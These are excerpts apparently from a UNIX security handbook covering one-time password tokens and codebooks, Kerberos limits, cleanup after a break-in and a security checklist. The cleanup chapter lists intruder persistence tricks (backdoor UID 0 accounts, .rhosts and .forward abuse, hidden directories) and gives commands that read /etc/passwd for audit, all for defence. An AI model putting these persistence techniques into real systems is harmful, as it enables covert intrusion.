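($challenge, $pin) = @ARGV;
die "usage: toytoken challenge PIN\n"
    unless defined($pin) && length($challenge) >= 2;

$secret = "k7Q9zW";        # secret programmed into the "token" (example only)

# Both the host and the token run the same calculation; the last six
# characters of the crypt() result serve as the one-time response.
$response = substr(crypt("$secret$pin$challenge", substr($challenge, 0, 2)), -6);
print "response: $response\n";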

Figure 8.4: Digital Pathways <strong>Sec</strong>ureNet key card<br />


There are many other vendors of one-time tokens, but the ideas behind their products are all basically the<br />

same. Some of these systems also can provide interesting add-on features, such as a duress code. If the<br />

user is being coerced to enter the correct password with the card value, he can enter a different password<br />

that will allow limited access, but will also trigger a remote alarm to notify management that something<br />

is wrong.<br />

There are two common drawbacks of these systems: the cards tend to be a bit fragile, and they have<br />

batteries that eventually discharge. The cost-per-unit may be a significant barrier for an organization that<br />

doesn't have an appropriate budget for security (but they are cheaper than many major break-ins!). And<br />

the cards can be annoying, especially when you take 90 minutes to get to work, only to discover that you<br />

left your token card at home.<br />

However, the token approach does work reliably and effectively. The vendors of these systems typically<br />

provide packages that easily integrate them into programs such as /bin/login, as well as libraries that<br />

allow you to integrate these tokens into your own systems as well. Several major corporations and labs<br />

have used these systems for years. Tokens eliminate the risks of password sniffing. They cannot be<br />

shared like passwords. Indeed, the tokens do work as advertised - something that may make them well<br />

worth the cost involved.<br />

8.7.3 Code Books<br />

A second popular method for supplying one-time passwords is to generate a codebook of some sort. This<br />

is a list of passwords that are used, one at a time, and then never reused. The passwords are generated in<br />

some way based on a shared secret. This method is a form of one-time pad (see <strong>Sec</strong>tion 6.4.7, "An<br />

Unbreakable Encryption Algorithm").<br />

When a user wishes to log in to the system in question, the user either looks up the next password in the<br />


code book, or generates the next password in the virtual codebook. This password is then used as the<br />

password to give to the system. The user may also need to specify a fixed password along with the<br />

codebook entry.<br />

Codebooks can be static, in which case they may be printed out on a small sheet of paper to be carried by<br />

the user. Each time a password is used, the user crosses the entry off the list. After the list is completely<br />

used, the system administrator or user generates another list. Alternatively, the codebook entries can be<br />

generated by any PC the user may have (this makes it like a token-based system). However, this means<br />

that if the user is careless and leaves critical information on the PC (as in a programmed function key),<br />

anyone else with access to the PC may be able to log in as the user.<br />

One of the best known forms of codebook schemes is that presented by S/Key. S/Key is a one-time<br />

password system developed at Bellcore based on a 1981 article by Leslie Lamport. With the system, each<br />

user is given a mathematical algorithm, which is used to generate a sequence of passwords. The user can<br />

either run this algorithm on a portable computer when needed, or can print out a listing of "good<br />

passwords" as a paper codebook. Figure 8.5 shows such a list.<br />

Unfortunately, the developers of S/Key did not maintain the system or integrate it into freely<br />

redistributable versions of /bin/login, /usr/ucb/ftpd, and other programs that require user authentication.<br />

As a result, others undertook those tasks, and there are now a variety of S/Key implementations available<br />

on the <strong>Internet</strong>. Each of these has different features and functionality. We note the location of several of<br />

these systems in Appendix E, Electronic Resources.<br />
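The hash-chain idea at the heart of these schemes is easy to sketch. The Perl fragment below uses the Digest::MD5 module (available from CPAN) simply as a convenient one-way function; it is not interoperable with S/Key, which specifies its own MD4-based hash, output folding, and dictionary-word encoding.

#!/usr/local/bin/perl
#
# chainbook: print a small "codebook" of one-time passwords built from
# a Lamport-style hash chain.  This illustrates the idea only; it is
# NOT compatible with S/Key.  Digest::MD5 is used purely as a
# convenient one-way function.
#
use Digest::MD5 qw(md5_hex);

$secret = shift || die "usage: chainbook secret-passphrase\n";
$n      = 10;                            # number of one-time passwords

# Hash the secret n+1 times; the passwords are used in the reverse of
# the order in which they were computed.
$h = md5_hex($secret);
for ($i = 0; $i <= $n; $i++) {
    push(@chain, $h);
    $h = md5_hex($h);
}

# The host stores only the last value; each password the user supplies
# must hash to the value the host currently holds, and then replaces it.
print "host should store: $chain[$n]\n\n";
for ($i = $n - 1; $i >= 0; $i--) {
    printf "password %2d: %s\n", $n - $i, $chain[$i];
}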

Figure 8.5: S/Key password printout<br />


Kerberos and DCE: Alternatives to One-Time Passwords?<br />

Kerberos and DCE are two systems which allow workstations to authenticate themselves to services<br />

running on servers without ever sending a password in clear text over the network. At first glance, then,<br />

Kerberos and DCE appear immune to password sniffers. If used properly, they are.

Unfortunately, Kerberos and DCE have their drawbacks. The first is that both systems require<br />

modification to both the client and the server: you cannot connect to a Kerberos service from any<br />

workstation on the <strong>Internet</strong>. Instead, you can only use workstations that are specially configured to run<br />

the exact version of Kerberos or DCE which your server happens to use.<br />

A bigger problem, though, happens when users try to log into computers running Kerberos over the<br />

network. Take the example of an MIT professor, who wishes to access her MIT computer account from a<br />

colleague's computer at Stanford. In this case, the professor will sit down at the Stanford computer, telnet<br />

to the MIT computer, and type her password. As a result, her password will travel over the <strong>Internet</strong> in the<br />

clear on its way to the secure Kerberos workstation. In the process, it may be picked up by a password<br />

sniffer. The same could happen if she were using one of the many DCE implementations currently<br />

available.<br />

Of course, Kerberos isn't supposed to work in this manner. At Stanford, the MIT professor is supposed to<br />

be able to sit down at a Kerberos-equipped workstation and use it to transmit an encrypted password over

the <strong>Internet</strong> using the standard Kerberos encryption scheme. The problem, though, is that the workstation<br />

must be able to locate the Kerberos server at MIT to use it, which often requires prior setup. And the<br />

Kerberos- (or DCE-) equipped workstation, with compatible versions of the software, needs to be at<br />

Stanford in the first place. Thus, while Kerberos and DCE may seem as if they are alternatives to<br />

one-time passwords, they unfortunately are not in many real-world cases.<br />

The Kerberos system's biggest problem, though, is that it still allows users to pick bad passwords and to<br />

write them down.<br />


Chapter 24
Discovering a Break-in

24.4 Cleaning Up After the Intruder

If your intruder gained superuser access, or access to another privileged account such as uucp, he may have modified your system to make it easier for him to break in again in the future. In particular, your intruder may have:

● Created a new account
● Changed the password on an existing account
● Changed the protections on certain files or devices
● Created SUID or SGID programs
● Replaced or modified system programs
● Installed a special alias in the mail system to run a program
● Added new features to your news or UUCP system
● Installed a password sniffer
● Stolen the password file for later cracking

If the intruder committed either of the last two misdeeds, he'll now have access to a legitimate account and will be able to get back in no matter what other precautions are taken. You'll have to change all of the passwords on the system.

After a successful break-in, you must perform a careful audit to determine the extent of the damage. Depending on the nature of the break-in, you'll have to examine your entire system. You may also need to examine other systems on your local net, or possibly the entire network (including routers and other network devices).

Note that COPS and Tiger are helpful recovery tools, as are many commercial security toolkits, especially because they provide an automatic check of the suggestions we make in this chapter. Remember, though, that they too could be compromised, so fetch a new copy and work from there. COPS and Tiger assume the integrity of system executables, such as ls and find. We think they are best used in conjunction with an integrity checker such as Tripwire. (See Appendix E, Electronic Resources for how to obtain all of these packages.)

The remainder of this chapter discusses in detail how to find out what an intruder may have done and how you should clean up afterwards.

24.4.1 New Accounts

After a break-in, scan the /etc/passwd file for newly created accounts. If you have made a backup copy of /etc/passwd, use diff to compare the two files. But don't let the automated check be a substitute for going through the /etc/passwd file by hand, because the intruder might have also modified your copy of the file or the diff program. (This is the reason it is advantageous to keep a second copy of the /etc/passwd file and all of your comparison tools on removable media like a floppy disk.)
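For example, if a known-good copy of the file is kept on a write-protected floppy, the comparison might look like the following. The mount point is hypothetical, and the output is a made-up illustration of what an added account would look like:

# diff /floppy/passwd.good /etc/passwd
3a4
> toor::0:0:Uninvited guest:/:/bin/sh
#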

Delete any accounts that have been created by an intruder. You may wish to make a paper record of an account before deleting it, in case you wish to prosecute the intruder (assuming that you ever find the villain).

Also, be sure to check that every line of the /etc/passwd file is in the proper format, and that no UID or password fields have been changed to unauthorized values. Remember, simply adding an extra colon to the /etc/passwd entry for root can do the same amount of damage as removing the superuser's password entirely!

The following awk command will print /etc/passwd entries that do not have seven fields, that specify the superuser, or that do not have a password:

# cat-passwd | awk -F: 'NF != 7 || $3 == 0 || $2 == "" { print $1 " " $2 " " $3}'
root xq7Xm0Tv 0
johnson f3V6Wv/u 0
sidney 104
#

This awk command sets the field separator to the colon (:), which matches the format of the /etc/passwd file. The awk command then prints out the first three fields (username, password, and UID) of any line in the /etc/passwd file that does not have seven fields, has a UID of 0, or has no password.

In this example, the user johnson has had her UID changed to 0, making her account an alias for the superuser, and the user sidney has had his password removed.

This automated check is much more reliable than a visual inspection, but make sure that the script you use to run it hasn't been corrupted by an attacker. One approach is to type the awk command each time you use it instead of embedding it in a shell script.[3]

[3] Or use Tripwire.

24.4.1.1 Changes in file contents

An intruder who gains superuser privileges can change any file on your system. Although you should make a thorough inventory of your computer's entire filesystem, you should look specifically for any changes to the system that affect security. For example, an intruder may have inserted trap doors or logic bombs to do damage at a later point in time.

One way to easily locate changes to system programs is to use the checklists described in Chapter 5, The UNIX Filesystem.
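As a rough illustration of the checklist approach, you can store a list of message digests for your system programs on removable media while the system is known to be clean. The commands below assume the GNU md5sum program and a hypothetical floppy mount point; they are a stopgap, not a replacement for a full integrity checker such as Tripwire:

# md5sum /bin/* /usr/bin/* > /floppy/checklist.md5

Later, after a suspected break-in, any program whose digest no longer matches can be listed with:

# md5sum -c /floppy/checklist.md5 | grep -v ': OK$'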

24.4.1.2 Changes in file and directory protections

After a break-in, review the protection of every critical file on your system. Intruders who gain superuser privileges may change the protections of critical files to make it easier for them to regain superuser access in the future. For example, an intruder might have changed the mode of the /bin directory to 777 to make it easier to modify system software later, or altered the protections on /dev/kmem so as to be able to modify system calls directly using a symbolic debugger.
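A quick way to spot this sort of tampering is to search the system directories and the device directory for anything that has become group- or world-writable. The directory list below is only a starting point and should be adapted to your system:

# find /etc /bin /usr/bin /usr/lib /dev \( -perm -20 -o -perm -2 \) -exec ls -ld {} \;

Expect some legitimate entries in the output (devices such as /dev/null and /dev/tty are normally world-writable); the point is to notice entries that were not writable before.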

24.4.1.3 New SUID and SGID files

Computer crackers who gain superuser access frequently create SUID and SGID files. After a break-in, scan your system to make sure that new SUID files have not been created. See Section 5.5, "SUID," for information about how to do this.
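One common form of the scan is shown below; compare its output against the offline list of SUID and SGID files made before the break-in:

# find / -type f \( -perm -4000 -o -perm -2000 \) -exec ls -ld {} \;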

24.4.1.4 Changes in .rhosts files

An intruder may have created new .rhosts files in your users' home directories, or may have modified existing .rhosts files. (The .rhosts file allows other users on the network to log into your account without providing a password. For more information, see Chapter 16.) After a break-in, tell your users to check their .rhosts files to make sure that none of these files have been modified.

Chapter 16 also contains a shell script that you can use to get a list of every .rhosts file on the system. After a break-in, you may wish to delete every .rhosts file rather than take the chance that a file modified by the attacker won't be caught by the account's rightful owner. After all, the .rhosts file is simply a convenience, and your legitimate users can recreate their .rhosts files as necessary.[4]

[4] At some sites, this may be a drastic measure, and might make some of your users very angry, so think it over carefully before taking this step. Alternatively, you could rename each .rhosts file to rhosts.old so that the file will not be used, and so that your users do not need to retype the entire file's contents.
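The script in Chapter 16 is the complete version; a minimal sketch of the same idea, which simply lists each .rhosts file found in a home directory (using the cat-passwd convention from earlier in this chapter), looks like this:

#!/bin/ksh
# List every .rhosts file found in a user's home directory.
for dir in $(cat-passwd | awk -F: 'length($6) > 0 { print $6 }')
do
    [[ -f $dir/.rhosts ]] && ls -l $dir/.rhosts
done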

24.4.1.5 Changes to the /etc/hosts.equiv file

An intruder may have added more machines to your /etc/hosts.equiv file, so be sure to check for changes to this file. Also, check your /etc/netgroups and /etc/exports files (or equivalent) if you are running NIS or NFS.

24.4.1.6 Changes to startup files

An intruder may have modified the contents of dot (.) files in your users' home directories. Instruct all of your users to check these files and report anything suspicious. You can force your users to check the files by renaming them to names like login.old, cshrc.old, and profile.old. Be sure to check the versions of those files belonging to the root user, and also check the /etc/profile file.

If you are using sendmail, the attacker may have created or modified .forward files so that they run programs when mail is received. This check is especially important for nonuser accounts such as ftp and uucp.
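A rough way to find .forward files that pipe incoming mail to a program is to search them for the "|" character. This sweep of the whole filesystem may be slow and will not catch every trick, but it is a reasonable first pass:

# find / -name .forward -print | xargs grep -l '|'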

If you know the precise time that the intruder was logged in, you can list all of the dot files in users' home directories, sort the list by time of day, and then check them for changes. A simple shell script to use is shown below:

#!/bin/ksh
# Search for .files in home directories
for user in $(cat-passwd | /bin/awk -F: 'length($6) > 0 {print $6}')
do
    for name in $user/.*
    do
        [[ $name == $user/.. ]] && continue
        [[ -f $name ]] && print "$name"
    done
done | xargs ls -ltd

However, using timestamps may not detect all modifications, as discussed at the end of this chapter. The -c and -l options to the ls command should also be used to check for modifications to permission settings, and to determine if the mtime was altered to hide a modification.

Another approach is to sweep the entire filesystem with the find command and observe what files and directories were accessed around the time of the intrusion. This may give you some clues as to what was done. For instance, if your compiler, loader, and libraries all show access times within a few seconds of each other, you can conclude that the intruder compiled something.

If you decide to take this approach, we suggest that you first remount all your filesystems as read-only so that your examinations don't alter the saved filesystem dates and times.
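For example, if you know roughly when the intruder was active, you can create two reference files bracketing that window (on a filesystem you have left writable) and ask find for everything modified in between. The timestamps below are made up, and -newer compares only modification times; some versions of find also offer -anewer and -cnewer for access and inode-change times:

# touch -t 9607171145 /tmp/before
# touch -t 9607171230 /tmp/after
# find / -newer /tmp/before ! -newer /tmp/after -print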

24.4.1.7 Hidden files and directories

The intruder may have created a "hidden directory" on your computer, and be using it as a repository for stolen information or for programs that break security.

On older UNIX systems, one common trick for creating a hidden directory was to unlink (as root) the ".." directory in a subdirectory and then create a new one. The contents of such a hidden directory are overlooked by programs such as find that search the filesystem for special files. Modern versions of UNIX, however, detect such hidden directories as inconsistencies when you run the /etc/fsck program. For this reason, be sure to run fsck on each filesystem as part of your routine security monitoring.

On some HP-UX systems, intruders have stored their tools and files in a CDF (Context Dependent File) directory. On these systems, be sure to use the -H option to find and ls when you are looking for files that are out of place.

Nowadays, intruders often hide their files in directories with names that are a little difficult to discover or enter on the command line. This way, a novice system administrator who discovers the hidden directory will be unlikely to figure out how to access its contents. Filenames that are difficult to discover or enter include ".. " (dot dot space), control characters, backspaces, or other special characters.

You can often discover hidden directories easily because they cause results that differ from those of normal directories. For example:

prose% ls -l
drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar
prose% cd foobar
foobar: No such file or directory
prose%

In this case, the real name of the directory is "foobar ", with a space following the letter r. The easy way of entering filenames like this one is to use the shell's wildcard capability: the wildcard *ob* will match the directory foobar, no matter how many spaces or other characters it has in it, as long as the letters o and b are adjacent.

prose% ls -l
drwxr-xr-x 1 orpheus 1024 Jul 17 11:55 foobar
prose% cd *ob*
prose%

If you suspect that a filename has embedded control characters, you can use the cat -v command to determine what they are. For example:

% ls -l
total 1
-rw-r--r-- 1 john 21 Mar 10 23:38 bogus?file
% echo * | cat -v
bogus^Yfile
%

In this example, the file bogus?file actually has a CTRL-Y character between the letters "bogus" and the letters "file". Some versions of the ls command print control characters as question marks (?). To see what the control character actually was, however, you must send the raw filename to the cat command, which is accomplished with the shell echo.

If you are using the 93 version of the Korn shell, you can also list all the files in the current directory in a readable manner. This approach works even when your ls command has been replaced with an altered version:

$ printf $'entry: %q\n' .* *
entry: .
entry: ..
entry: $'..\n'
entry: $'bogus\031file'
entry: temp0001
entry: temp0002
$

24.4.1.8 Unowned files

Sometimes attackers leave files in the filesystem that are not owned by any user or group - that is, the files have a UID or GID that does not correspond to any entries in the /etc/passwd and /etc/group files. This can happen if the attacker created an account and some files, and then deleted the account - leaving the files. Alternatively, the attacker might have been modifying the raw inodes on a disk and changed a UID by accident.

You can search for these files with the find command, as shown in the following example:

# find / \( -nouser -o -nogroup \) -print

Remember, if you are using NFS, you should instead run the following find command on each server:

# find / \( -local -o -prune \) \( -nouser -o -nogroup \) -print

You might also notice unowned files on your system if you delete a user from the /etc/passwd file but leave a few of that user's files on the system. It is a good idea to scan for unowned files on a regular basis, copy them to tape (in case they're ever needed), and then delete them from your system.
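One way to do this, sketched below with a hypothetical tape device name, is to save the list of unowned files, archive them with cpio, and then remove them:

# find / \( -nouser -o -nogroup \) -print > /tmp/unowned
# cpio -ocv < /tmp/unowned > /dev/rmt/0
# xargs rm -f < /tmp/unowned

Unowned directories are not removed by the last command; archive their contents first and then remove them separately with rmdir.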


Appendix A
A. UNIX Security Checklist

Contents:
Preface

This appendix summarizes the hints and recommendations made in this book. You can use this appendix as a reminder of things to examine and do, or you can use it as an index.

A.1 Preface

● Reread your manuals and vendor documentation.
● Mark your calendar for 6-12 months in the future to reread your manuals, again.

A.1.1 Chapter 1: Introduction

● Order other appropriate references on security and computer crime. Schedule time to read them when they arrive.
● Become familiar with your users' expectations and experience with UNIX.
● Write a letter to your vendors indicating your interest and concern about (insufficient) software quality and security features.
● Post a reminder above your computer or desk: "Security is not `Me versus the Users' but `All of Us versus Them.'"

A.1.1.1 Chapter 2: Policies and Guidelines

● Assess your environment. What do you need to protect? What are you protecting against?
● Understand priorities, budget, and resources available.
● Perform a risk assessment and cost-benefit analysis.
● Get management involved.
● Set priorities for security and use.
● Develop a positive security policy. Circulate it to all users.
● Ensure that authority is matched with responsibility.
● Ensure that everything to be protected has an "owner."
● Work to educate your users on good security practice.
● Don't have different, less secure rules for top-level management.

A.1.1.2 Chapter 3: Users and Passwords

● Be sure that every person who uses your computer has his or her own account.
● Be sure that every user's account has a password.
● After you change your password, don't forget it!
● After you change your password, test it with the su command, by trying to log in on another terminal, or by using the telnet localhost command.
● Pick strong, nonobvious passwords.
● Consider automatic generation or screening of passwords.
● Pick passwords that are not so difficult to remember that you have to write them down.
● If you must write down your password, don't make it obvious that what you have written is, in fact, a password. Do not write your account name or the name of the computer on the same piece of paper. Do not attach your password to your terminal, keyboard, or any part of your computer.
● Never record passwords online or send them to another user via electronic mail.
● Don't use your password as the password to another application such as a Multi-User Dungeon (MUD) game.
● Don't use your password on other computer systems under different administrative control.
● Consider use of one-time passwords, tokens, or smart cards.
● Ensure that all users know about good password management practices.

A.1.1.3 Chapter 4: Users, Groups, and the Superuser

● Ensure that no two regular users are assigned or share the same account.
● Never give any users, other than UUCP users, the same UID.
● Think about how you can assign group IDs to promote appropriate sharing and protection without sharing accounts.
● Avoid use of the root account for routine activities that can be done under a plain user ID.
● Think of how to protect especially sensitive files in the event that the root account is compromised. This protection includes use of removable media and encryption.
● Restrict access to the su command, or restrict the ability to su to user root.
● su to the user's ID when investigating problem reports rather than exploring as user root.
● Scan the files /var/adm/messages, /var/adm/sulog, or other appropriate log files on a regular basis for bad su attempts.

A.1.1.4 Chapter 5: The UNIX Filesystem

● Learn about the useful options to your version of the ls command.
● If your system has ACLs, learn how to use them. Remember, do not depend on ACLs to protect files on NFS partitions.
● Set your umask to an appropriate value (e.g., 027 or 077).
● Never write SUID/SGID shell scripts.
● Periodically scan your system for SUID/SGID files.
● Disable SUID on disk partition mounts (local and remote) unless necessary.
● Determine if write, chmod, chown, and chgrp operations on files clear the SUID/SGID bits on your system. Get in the habit of checking files based on this information.
● Scan for device files on your system. Check their ownership and permissions to ensure that they are reasonable.
● If your system has "universes" or Context Dependent Files (CDFs), be sure that all your administrative actions actually scan all the files and directories on your system.

A.1.1.5 Chapter 6: Cryptography

● Learn about the restrictions your government places on the use, export, and sale of cryptography. Consider contacting your legislators with your opinions on these laws, especially if they negatively impact your ability to protect your systems.
● Never use rot13 as an encryption method to protect data.
● Don't depend on the crypt command to protect anything particularly sensitive, especially if it is more than 1024 bytes in length.
● If you use the Data Encryption Standard (DES) algorithm for encryption, consider superencrypting with Triple-DES.
● Use the compress command (or similar compression system) on files before encrypting them.
● Learn how to use message digests. Obtain and install a message digest program (such as MD5).
● Never use a login password as an encryption key. Choose encryption keys as you would a password, however - avoid obvious or easily guessed words or patterns.
● Protect your encryption key as you would your password - don't write it down, put it in a shell file, or store it online.
● Protect your encryption programs against tampering.
● Avoid proprietary encryption methods whose strengths are not known.
● Consider obtaining a copy of the PGP software and making it available to your users. Use PGP to encrypt files and sensitive email, and to create and check digital signatures on important files.

A.1.1.6 Chapter 7: Backups

● Make regular backups.
● Be certain that everything on your system is on your backups.
● Remember to update your backup regimen whenever you update your system or change its configuration.
● Make paper copies of critical files for comparison or rebuilding your system (e.g., /etc/passwd, /etc/rc, and /etc/fstab).
● Make at least every other backup onto a different tape to guard against media failure.
● Do not reuse a backup tape too many times, because the tapes will eventually fail.
● Try to restore a few files from your backup tapes on a regular basis.
● Make periodic archive backups of your entire system and keep them forever.
● Try to completely rebuild your system from a set of backup tapes to be certain that your backup procedures are complete.
● Keep your backups under lock and key.
● Do not store your backups in the same room as your computer system: consider off-site backup storage.
● Ensure that access to your backup tapes during transport and storage is limited to authorized and trusted individuals.
● If your budget and needs are appropriate, investigate doing backups across a network link to a "hot spare" site.
● Encrypt your backups, but escrow the keys in case you lose them.
● When using software that accesses files directly rather than through the raw devices, consider remounting the filesystems as read-only during backups to prevent changes to file access times.
● Make periodic paper copies of important files.


A.1.1.7 Chapter 8: Defending Your Accounts

● Make sure that every account has a password.
● Make sure to change the password of every "default" account that came with your UNIX system.
● If possible, disable accounts like uucp and daemon so that people cannot use them to log into your system.
● Do not set up accounts that run single commands.
● Instead of logging into the root account, log in to your own account and use su.
● Do not create "default" or "guest" accounts for visitors.
● If you need to set up an account that can run only a few commands, use the rsh restricted shell.
● Think about creating restricted filesystem accounts for special-purpose commands or users.
● Do not set up a single account that is shared by a group of people. Use the group ID mechanism instead.
● Monitor the format and contents of the /etc/passwd file.
● Put time/tty restrictions on login to accounts as appropriate.
● Disable dormant accounts on your computer.
● Disable the accounts of people on extended vacations.
● Establish a system by which accounts are always created with a fixed expiration date and must be renewed to be kept active.
● Do not declare network connections, modems, or public terminals as "secure" in the /etc/default/login or /etc/ttys files.
● Be careful who you put in the wheel group, as these people can use the su command to become the superuser (if applicable).
● If possible, set your systems to require the root password when rebooting in single-user mode.
● If your system supports the TCB/trusted path mechanism, enable it.
● If your system allows the use of a longer password than the standard crypt() uses, enable it. Tell your users to use longer passwords.
● Consider using some form of one-time password or token-based authentication, especially on accounts that may be used across a network link.
● Consider using the Distributed Computing Environment (DCE) or Kerberos for any local network of single-user workstations, if your vendor software allows it.
● Enable password constraints, if present in your software, to help prevent users from picking bad passwords. Otherwise, consider adding password screening or coaching software to assist your users in picking good passwords.
● Consider cracking your own passwords periodically, but don't place much faith in results that show no passwords cracked.
● If you have shadow password capability, enable it. If your software does not support a shadow password file, contact the vendor and request that such support be added.
● If your system does not have a shadow password file, make sure that the file /etc/passwd cannot be read anonymously over the network via UUCP or TFTP.
● If your computer supports password aging, set a lifetime between one and six months.
● If you have source code for your operating system, you may wish to slightly alter the algorithm used by crypt() to encrypt your password. For example, you can increase the number of encryption rounds from 25 to 200.
● If you are using a central mail server or firewall, consider the benefits of account-name aliasing.

A.1.1.8 Chapter 9: Integrity Management

● If your system supports immutable files, use them. If you don't have them, consider asking your vendor when they will be supported in your version of UNIX.
● If possible, mount disks read-only if they contain system software.
● Make a checklist listing the size, modification time, and permissions of every program on your system. You may wish to include cryptographic checksums in the lists. Keep copies of this checklist on removable media and use them to determine if any of your system files or programs have been modified.
● Write a daily check script to check for unauthorized changes to files and system directories (a sample sketch follows this list).
● Double check the protection attributes on system command and data files, on their directories, and on all ancestor directories.
● If you export filesystems containing system programs, you may wish to export these filesystems read-only, so that they cannot be modified by NFS clients.
● Consider making all files on NFS-exported disks owned by user root.
● If you have backups of critical directories, you can use comparison checking to detect unauthorized modifications. Be careful to protect your backup copies and comparison programs from potential attackers.
● Consider running rdist from a protected system on a regular basis to report changes.
● Make an offline list of every SUID and SGID file on your system.
● Consider installing something to check message digests of files (e.g., Tripwire). Be certain that the program and all its data files are stored on read-only media or protected with encryption (or both).
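As a starting point for the daily check script mentioned above, the sketch below (meant to be run from cron) compares a saved listing of system directories against the current state and mails any differences to root. Every path shown is an assumption, the reference listing should live on protected or removable media, and a message-digest tool such as Tripwire remains the stronger check.

#!/bin/ksh
# Nightly comparison of system directory listings against a saved reference.
# Create the reference once, while the system is known to be clean:
#     ls -lR /bin /usr/bin /etc > /usr/adm/filelist.ref
ls -lR /bin /usr/bin /etc > /tmp/filelist.$$
cmp -s /usr/adm/filelist.ref /tmp/filelist.$$ ||
    diff /usr/adm/filelist.ref /tmp/filelist.$$ | mailx -s "filesystem changes" root
rm -f /tmp/filelist.$$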


A.1.1.9 Chapter 10: Auditing and Logging

● Consider installing a dedicated PC or other non-UNIX machine as a network log host.
● Have your users check the last login time each time they log in to make sure that nobody else is using their accounts.
● Consider installing a simple cron task to save copies of the lastlog file to track logins.
● Evaluate whether C2 logging on your system is practical and appropriate. If so, install it.
● Determine if there is an intrusion-detection and/or audit-reduction tool available to use with your C2 logs.
● Make sure that your utmp file is not world writable.
● Turn on whatever accounting mechanism you may have that logs command usage.
● Run last periodically to see who has been using the system. Use this program on a regular basis.
● Review your specialized log files on a regular basis. This review should include (if they exist on your system) loginlog, sulog, aculog, xferlog, and others.
● Consider adding an automatic log monitor such as Swatch.
● Make sure that your log files are on your daily backups before they get reset.
● If you have syslog, configure it so that all auth messages are logged to a special file (see the example following this list). If you can, also have these messages logged to a special hardcopy printer and to another computer on your network.
● Be aware that log file entries may be forged and misleading in the event of a carefully crafted attack.
● Keep a paper log on a per-site and per-machine basis.
● If you process your logs in an automated fashion, craft your filters so that they exclude the things you don't want rather than pass only what you do want. This approach will ensure that you see all exceptional condition messages.
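As an example of the syslog item above, /etc/syslog.conf entries along the following lines send auth messages to their own file and to a central loghost. The file name and host name are assumptions, the fields must be separated by tabs on most versions of syslogd (shown here as whitespace), and a few systems use a different facility name for authorization messages:

auth.info       /var/adm/authlog
auth.info       @loghost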

A.1.1.10 Chapter 11: Protecting Against Programmed Threats

● Be extremely careful about installing new software. Never install binaries obtained from untrustworthy sources (like the Usenet).
● When installing new software, install it first on a noncritical system on which you can test it and observe any misbehavior or bugs.
● Run integrity checks on your system on a regular basis (see Chapter 9).
● Don't include nonstandard directories in your execution path.
● Don't leave any bin or library directories writable by untrustworthy accounts.
● Set permissions on commands to prevent unauthorized alteration.
● Scan your system for any user home directories or dot files that are world writable or group writable.
● If you suspect a network-based worm attack or a virus in widely circulated software, call a FIRST response team or the vendor to confirm the instance before spreading any alarm.
● Never write or use SUID or SGID shell scripts unless you are a hoary UNIX wizard.
● Disable terminal answer-back, if possible.
● Never have "." (the current directory) in your search path. Never have writable directories in your search path.
● When running as the superuser, get in the habit of typing full pathnames for commands.
● Check the behavior of your xargs and find commands. Review the use of these commands (and the shell) in all scripts executed by cron.
● Watch for unauthorized modification to initialization files in any user or system account, including editor start-up files, .forward files, etc.
● Periodically review all system start-up and configuration files for additions and changes.
● Periodically review mailer alias files for unauthorized changes.
● Periodically review configuration files for server programs (e.g., inetd.conf).
● Check the security of your at program, and disable the program if necessary.
● Verify that any files run from the cron command files cannot be altered or replaced by unauthorized users.
● Don't use the vi or ex editors in a directory without first checking for a Trojan .exrc file. Disable the automatic command execution feature in GNU Emacs.
● Make sure that the devices used for backups are not world readable.
● Make sure that any shared libraries are properly protected and that protections cannot be overridden.

A.1.1.11 Chapter 12: Physical Security

● Develop a physical security plan that includes a description of your assets, environment, threats, perimeter, and defenses.
● Determine who might have physical access to any of your resources under any circumstances.
● Have heat and smoke alarms in your computer room. If you have a raised floor, install alarm sensors both above and below the floor. If you have a dropped ceiling, put sensors above the ceiling, too.


● Check the placement and recharge status of fire extinguishers on a regular basis.
● Make sure that personnel know how to use all fire protection and suppression equipment.
● Make sure that the placement and nature of fire-suppression systems will not endanger personnel or equipment more than is necessary.
● Have water sensors installed above and below raised floors in your computer room.
● Train your users and operators about what to do when an alarm sounds.
● Strictly prohibit smoking, eating, and drinking in your computer room or near computer equipment.
● Install and regularly clean air filters in your computer room.
● Place your computer systems where they will be protected in the event of earthquake, explosion, or structural failure.
● Keep your backups offsite.
● Have temperature and humidity controls in your computer room. Have alarms associated with the systems to indicate if values get out of range. Have recorders to monitor these values over time.
● Beware of insects trying to "bug" your computers.
● Install filtered power and/or surge protectors for all your computer equipment. Consider installing an uninterruptible power supply, if appropriate.
● Have antistatic measures in place.
● Store computer equipment and magnetic media away from building structural steel members that might conduct electricity after a lightning strike.
● Lock and physically isolate your computers from public access.
● Consider putting motion alarms or other protections in place to protect valuable equipment when personnel are not present.
● Protect power switches and fuses.
● Avoid having glass walls or large windows in your computer room.
● Protect all your network cables, terminators, and connectors from tampering. Examine them periodically.
● Use locks, tie-downs, and bolts to keep computer equipment from being carried away.
● Encrypt sensitive data held on your systems.
● Have disaster-recovery and business-continuation plans in place.
● Consider using fiber optic cable for networks.


● Physically protect your backups and test them periodically.
● Sanitize media (e.g., tapes and disks) and printouts before disposal. Use bulk erasers, shredders, or incinerators.
● Check peripheral devices for local onboard storage that can lead to disclosure of information.
● Consider encrypting all of your backups and offline storage.
● Never use programmable function keys on a terminal for login or password information.
● Consider setting autologout on user accounts.

A.1.1.12 Chapter 13: Personnel Security

● Conduct background checks of individuals being considered for sensitive positions. Do so with the permission of the applicants.
● If the position is extremely sensitive, and if it is legally allowable, consider using a polygraph examination of the candidate.
● Have applicants and contractors in sensitive positions obtain bonding.
● Provide comprehensive and appropriate training for all new personnel, and for personnel taking on new assignments.
● Provide refresher training on a regular basis.
● Make sure that staff have adequate time and resources to pursue continuing education opportunities.
● Institute an ongoing user security-awareness program.
● Have regular performance reviews and monitoring. Try to resolve potential problems before they become real problems.
● Make sure that users in sensitive positions are not overloaded with work, responsibility or stress on a frequent or regular basis, even if compensated for the overload. In particular, users should be required to take holiday and vacation leave regularly.
● Monitor users in sensitive positions (without intruding on their privacy) for signs of excess stress or personal problems.
● Audit access to equipment and critical data.
● Apply policies of least privilege and separation of duties where applicable.
● When any user leaves the organization, make sure that access is properly terminated and duties transferred.
● Make sure that no user becomes irreplaceable.

A.1.1.13 Chapter 14: Telephone Security

● Make sure that incoming modems automatically log out the user if the telephone call gets interrupted.
● Make sure that incoming modems automatically hang up on an incoming call if the caller logs out or if the caller's login process gets killed.
● Make sure that outgoing modems hang up on the outgoing call if the tip or cu program is exited.
● Make sure that the tip or cu programs automatically exit if the user gets logged out of the remote machine or if the telephone call is interrupted.
● Make sure that there is no way for the local user to reprogram the modem.
● Do not install call forwarding on any of your incoming lines.
